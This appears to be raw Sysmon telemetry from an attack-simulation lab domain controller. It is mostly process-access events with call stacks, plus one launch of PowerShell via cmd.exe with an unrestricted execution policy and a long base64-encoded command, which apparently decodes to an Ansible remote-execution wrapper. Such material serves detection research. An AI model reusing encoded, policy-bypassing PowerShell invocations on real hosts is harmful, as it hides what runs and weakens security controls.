13:52:25.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000338Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.868{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000337Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000336Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000335Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000334Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000333Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000332Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83AA-5FCF-0500-000000009001}640760C:\Windows\system32\csrss.exe{10ACEC4A-8519-5FCF-D302-000000009001}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000331Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-8519-5FCF-D202-000000009001}43925028C:\Windows\system32\cmd.exe{10ACEC4A-8519-5FCF-D302-000000009001}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000330Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.867{10ACEC4A-8519-5FCF-D302-000000009001}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8519-5FCF-C3B8-100000000000}0x10b8c30HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8519-5FCF-D202-000000009001}4392C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x8000000000000000329Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000328Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-8519-5FCF-D102-000000009001}48362632C:\Windows\system32\conhost.exe{10ACEC4A-8519-5FCF-D202-000000009001}4392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000327Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000326Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.852{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000325Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 